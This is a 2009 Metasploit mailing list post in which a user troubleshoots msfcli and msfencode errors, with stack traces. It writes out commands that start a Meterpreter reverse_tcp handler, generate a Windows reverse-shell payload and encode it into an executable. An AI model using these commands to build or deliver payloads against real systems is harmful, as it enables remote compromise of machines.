Metasploit mailing list archives

Re: possible bug in MSFCLI and msfencode?

From: Thomas Werth <security () vahle de>
Date: Fri, 11 Dec 2009 08:51:15 +0100

Ok, just solved first report:

correct syntax of msfcli is:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.1.10 LPORT=7777 ENCODING=shikata_ga_nai E

but second one is still open ...
Using an other encoder works so should there be a warning instead of an
abort about this in msfencode?

Am 11.12.2009 08:15, schrieb Thomas Werth:

Dear List,

i've installed latest svn of MSF on Backtrack 4 Beta.
Just tried to use msfcli and got following error:

root@vpcbt:/pentest/exploits/framework3# ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=7777
ENCODING= E
[*] Please wait while we load the module tree...
./lib/msf/core/data_store.rb:93:in `each': The argument could not be
parsed correctly. (Rex::ArgumentParseError)
        from ./lib/msf/core/data_store.rb:93:in `import_options_from_s'
        from ./msfcli:140


did i miss something? I could bet this one had run on former version of
msf fine...


Furthermore i get some error uses msfencode to encode a payload created
with msfpayload:

#creating Payload
root@vpcbt:/pentest/exploits/framework3# ./msfpayload
windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=7777 R > ./test.payload

#start encoding
root@vpcbt:/pentest/exploits/framework3# ./msfencode -e
x86/avoid_utf8_tolower -i ./test.payload -o ./test.encoded -t exe -c 4
(eval):146:in `decoder_stub': The payload being encoded is of an
incompatible size (79 bytes)   from ./lib/msf/core/encoder.rb:270:in
`do_encode'
        from ./lib/msf/core/encoder.rb:254:in `encode'
        from ./msfencode:188
        from ./msfencode:185:in `upto'
        from ./msfencode:185
        from ./msfencode:175:in `each'
        from ./msfencode:175


Did i something wrong or is here a bug?

greets
Thomas
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

ruby coding question, (continued)
- - ruby coding question Jeffs (Dec 08)
    - Re: ruby coding question HD Moore (Dec 08)
    - patchup prefix Jeffs (Dec 10)
    - Re: patchup prefix egypt (Dec 10)
    - Re: patchup prefix HD Moore (Dec 10)
    - exploit -j command Jeffs (Dec 10)
    - Re: exploit -j command egypt (Dec 10)
    - possible bug in MSFCLI and msfencode? Thomas Werth (Dec 10)
    - Re: possible bug in MSFCLI and msfencode? HD Moore (Dec 10)
    - Re: possible bug in MSFCLI and msfencode? Thomas Werth (Dec 10)
    - Re: possible bug in MSFCLI and msfencode? Thomas Werth (Dec 10)
    - Re: possible bug in MSFCLI and msfencode? HD Moore (Dec 11)
    - Re: exploit -j command HD Moore (Dec 10)
    - encoded payload question Jeffs (Dec 13)
    - Re: encoded payload question MC (Dec 14)
    - Re: encoded payload question Jeffs (Dec 14)
    - Re: encoded payload question HD Moore (Dec 14)